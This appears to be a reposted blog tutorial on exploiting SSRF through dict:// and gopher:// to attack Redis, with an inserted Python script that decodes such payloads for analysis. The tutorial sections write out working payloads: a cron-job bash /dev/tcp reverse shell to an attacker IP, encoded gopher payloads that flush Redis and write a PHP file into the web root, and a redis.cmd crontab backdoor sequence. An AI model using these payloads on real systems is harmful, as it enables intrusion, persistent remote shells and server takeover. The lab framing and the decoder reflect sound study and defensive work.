SSRF: Using dict and gopher to beat up Redis (2)

[screenshot: image-20201223182344439]

The write to the target's Redis succeeded; note the final save, which persists the dataset to disk.

[screenshot: image-20201223182404919]

Connecting with AntSword

[screenshot: image-20201223204150542]

dict against Redis: reverse shell via a cron job

Because writing files on Ubuntu through Redis keeps running into mysterious problems, the CentOS Redis environment prepared above is used here.

set 1 '\n\n*/1 * * * * root /bin/bash -i >& /dev/tcp/ip/port 0>&1\n\n'

Converted, this becomes:

url=dict://192.168.124.153:6380/set:shell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.124.141/2333\x200\x3e\x261\n\n"

Note that the backslash must not be written as \x5c here; write \n directly. Do not write \r\n either: the Linux line terminator is \n, and a \r may instead cause parameter pollution.

[screenshot: image-20201230225238747]

Exploiting via the gopher protocol: writing a webshell with gopher

Here sec_tools is used to generate the gopher-protocol payload.

Tool: https://github.com/firebroo/sec_tools/tree/master/

Usage:

Write the Redis commands needed for the attack into redis.cmd.

[screenshot: image-20201229161117660]

Run redis-over-gopher.py to obtain the payload.

[screenshot: image-20201229161259613]

Replace the ip and port according to the target's information.

If the request is sent with the curl command (for example curl + gopher on the command line), URL-encoding once is enough, i.e. the payload below works:

gopher://192.168.124.153:6380/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%31%33%0d%0a%73%68%65%6c%6c%5f%73%65%63%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a

If the SSRF is in a web-side parameter, the payload has to be URL-encoded twice to get through; with only one round of encoding the ? interferes and the rest of the payload never arrives. Only the special characters need to be encoded, as follows:

gopher://192.168.124.153:6380/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2531%2533%250d%250a%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2531%2533%250d%250a%2573%2568%2565%256c%256c%255f%2573%2565%2563%252e%2570%2568%2570%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2538%250d%250a%2577%2565%2562%2573%2568%2565%256c%256c%250d%250a%2524%2531%2538%250d%250a%253c%253f%2570%2568%2570%2520%2570%2568%2570%2569%256e%2566%256f%2528%2529%253b%253f%253e%250d%250a%252a%2531%250d%250a%2524%2534%250d%250a%2573%2561%2576%2565%250d%250a

Written successfully.

[screenshot: image-20201229163050072]
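The gopher payloads above, and the dict:// URL in the earlier cron-job section, are easiest to reason about once they are turned back into the Redis commands they carry; an analyst who finds such a URL in an SSRF probe log wants to know exactly what it would do before blocking or replaying it. The following Python script is an added example, not part of the original post and not code from sec_tools. It decodes a captured gopher:// URL (one or two rounds of percent-encoding, as the post distinguishes) or a dict:// URL into Redis argument lists and flags the CONFIG SET dir/dbfilename + SAVE chain that turns a key write into a file write. The function names (unwrap_gopher, parse_resp, decode_dict, assess) are my own; the dict decoding assumes curl's behaviour of sending a non-standard dict path as one line with ':' replaced by spaces, and Redis's inline-command quoting rules for \xHH and \n escapes inside double quotes. The three sample URLs are the ones shown on this page.

```python
"""Turn dict:// and gopher:// Redis probes captured from SSRF logs back into the
Redis commands they carry, so an analyst can see what a request would do.
Added example; not part of the original post and not code from sec_tools."""
import re
from urllib.parse import unquote

# Commands that, chained with CONFIG SET dir/dbfilename, turn a key write into a file write.
SENSITIVE = {"CONFIG", "SAVE", "BGSAVE", "FLUSHALL", "SLAVEOF", "REPLICAOF", "MODULE", "DEBUG"}

# Sample inputs: the three URLs shown on this page, reused here as test data for the decoder.
GOPHER_ONCE = "gopher://192.168.124.153:6380/_%2a%31%0d%0a%24%38%0d%0a%66%6c%75%73%68%61%6c%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%33%0d%0a%64%69%72%0d%0a%24%31%33%0d%0a%2f%76%61%72%2f%77%77%77%2f%68%74%6d%6c%0d%0a%2a%34%0d%0a%24%36%0d%0a%63%6f%6e%66%69%67%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%31%30%0d%0a%64%62%66%69%6c%65%6e%61%6d%65%0d%0a%24%31%33%0d%0a%73%68%65%6c%6c%5f%73%65%63%2e%70%68%70%0d%0a%2a%33%0d%0a%24%33%0d%0a%73%65%74%0d%0a%24%38%0d%0a%77%65%62%73%68%65%6c%6c%0d%0a%24%31%38%0d%0a%3c%3f%70%68%70%20%70%68%70%69%6e%66%6f%28%29%3b%3f%3e%0d%0a%2a%31%0d%0a%24%34%0d%0a%73%61%76%65%0d%0a"
GOPHER_TWICE = "gopher://192.168.124.153:6380/_%252a%2531%250d%250a%2524%2538%250d%250a%2566%256c%2575%2573%2568%2561%256c%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2533%250d%250a%2564%2569%2572%250d%250a%2524%2531%2533%250d%250a%252f%2576%2561%2572%252f%2577%2577%2577%252f%2568%2574%256d%256c%250d%250a%252a%2534%250d%250a%2524%2536%250d%250a%2563%256f%256e%2566%2569%2567%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2531%2530%250d%250a%2564%2562%2566%2569%256c%2565%256e%2561%256d%2565%250d%250a%2524%2531%2533%250d%250a%2573%2568%2565%256c%256c%255f%2573%2565%2563%252e%2570%2568%2570%250d%250a%252a%2533%250d%250a%2524%2533%250d%250a%2573%2565%2574%250d%250a%2524%2538%250d%250a%2577%2565%2562%2573%2568%2565%256c%256c%250d%250a%2524%2531%2538%250d%250a%253c%253f%2570%2568%2570%2520%2570%2568%2570%2569%256e%2566%256f%2528%2529%253b%253f%253e%250d%250a%252a%2531%250d%250a%2524%2534%250d%250a%2573%2561%2576%2565%250d%250a"
DICT_PROBE = r'dict://192.168.124.153:6380/set:shell:"\n\n\x2a\x20\x2a\x20\x2a\x20\x2a\x20\x2a\x20root\x20/bin/bash\x20\x2di\x20\x3e\x26\x20/dev/tcp/192.168.124.141/2333\x200\x3e\x261\n\n"'


def unwrap_gopher(url: str, max_rounds: int = 3) -> tuple[bytes, int]:
    """Return the raw selector bytes and the number of percent-decoding rounds needed.
    A payload that reaches Redis through a web parameter is usually encoded twice (once
    for the vulnerable app, once for the gopher client), so decode until the RESP array
    marker '*' appears or the round limit is hit."""
    if not url.startswith("gopher://"):
        raise ValueError("not a gopher URL")
    _host, _, selector = url[len("gopher://"):].partition("/")
    payload = selector[1:]  # drop the one-character gopher item type ('_' in these URLs)
    rounds = 0
    while not payload.startswith("*") and "%" in payload and rounds < max_rounds:
        payload = unquote(payload, encoding="latin-1")
        rounds += 1
    return payload.encode("latin-1"), rounds


def parse_resp(data: bytes) -> list[list[str]]:
    """Parse consecutive RESP arrays of bulk strings (*N, then N times $len CRLF value CRLF)."""
    cmds, i = [], 0
    while i < len(data):
        if data[i:i + 1] != b"*":
            raise ValueError(f"expected '*' at offset {i}")
        end = data.index(b"\r\n", i)
        argc, i = int(data[i + 1:end]), end + 2
        args = []
        for _ in range(argc):
            if data[i:i + 1] != b"$":
                raise ValueError(f"expected '$' at offset {i}")
            end = data.index(b"\r\n", i)
            length, i = int(data[i + 1:end]), end + 2
            args.append(data[i:i + length].decode("latin-1"))
            i += length + 2  # skip the value and its trailing CRLF
        cmds.append(args)
    return cmds


_ESC = re.compile(r"\\x([0-9a-fA-F]{2})|\\([nrt\\\"])")


def _unescape_inline(arg: str) -> str:
    """Undo the escapes Redis accepts inside a double-quoted inline argument (assumed rules)."""
    table = {"n": "\n", "r": "\r", "t": "\t", "\\": "\\", '"': '"'}
    return _ESC.sub(lambda m: chr(int(m.group(1), 16)) if m.group(1) else table[m.group(2)], arg)


def decode_dict(url: str) -> list[str]:
    """curl sends a non-standard dict:// path as one line with ':' turned into spaces;
    Redis then splits that line like redis-cli would, honouring "..." quoting."""
    if not url.startswith("dict://"):
        raise ValueError("not a dict URL")
    _host, _, path = url[len("dict://"):].partition("/")
    args = []
    for tok in path.split(":"):
        if len(tok) >= 2 and tok[0] == '"' and tok[-1] == '"':
            tok = _unescape_inline(tok[1:-1])
        args.append(tok)
    return args


def assess(cmds: list[list[str]]) -> list[str]:
    """Flag sensitive commands and the dir + dbfilename + SAVE chain that writes a file."""
    findings, rdb_dir, rdb_file, saved = [], None, None, False
    for args in cmds:
        if not args:
            continue
        name = args[0].upper()
        if name in SENSITIVE:
            findings.append("sensitive command: " + " ".join(args[:3]))
        if name == "CONFIG" and len(args) == 4 and args[1].upper() == "SET":
            if args[2].lower() == "dir":
                rdb_dir = args[3]
            elif args[2].lower() == "dbfilename":
                rdb_file = args[3]
        if name in ("SAVE", "BGSAVE"):
            saved = True
        if name == "SET" and len(args) == 3 and "/dev/tcp/" in args[2]:
            findings.append("value contains a /dev/tcp reverse-shell pattern")
    if rdb_dir and rdb_file and saved:
        findings.append(f"RDB dump would be written to {rdb_dir}/{rdb_file}")
    return findings


if __name__ == "__main__":
    for url in (GOPHER_ONCE, GOPHER_TWICE):
        raw, rounds = unwrap_gopher(url)
        cmds = parse_resp(raw)
        print(f"gopher, {rounds} decoding round(s): {cmds}\n  -> {assess(cmds)}")
    dict_cmd = decode_dict(DICT_PROBE)
    print(f"dict: {dict_cmd!r}\n  -> {assess([dict_cmd])}")
```

Running it shows the single-encoded URL needing one decoding round and the web-parameter version needing two, both yielding the same five commands (flushall, the two config set calls, the key write and save), which is exactly the "encode twice" point made above; the dict URL decodes to a single set command whose value is the cron line. Stopping the decode loop at the first '*' also avoids over-decoding a value that legitimately contains a '%'.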

gopher: reverse shell via a cron job

About cron jobs:

CentOS: in /var/spool/cron/root or /etc/crontab

Ubuntu: in /var/spool/cron/crontabs/root or /etc/crontab

Writing cron jobs on Ubuntu through Redis keeps running into problems, so the CentOS environment is used here.

As with attacking Redis via dict, first write the reverse-shell commands into redis.cmd:

flushall
config set dir /var/spool/cron
config set dbfilename root
set shell "\n\n*/1 * * * * bash -i >& /dev/tcp/192.168.124.141/2333 0>&1\n\n"
save

Run redis-over-gopher.py to generate the payload, then change the ip and port in the payload.

Copyright notice: unless otherwise stated, all articles are original to this site.

Reprints must cite the source: https://www.heiqu.com/wpxwzj.html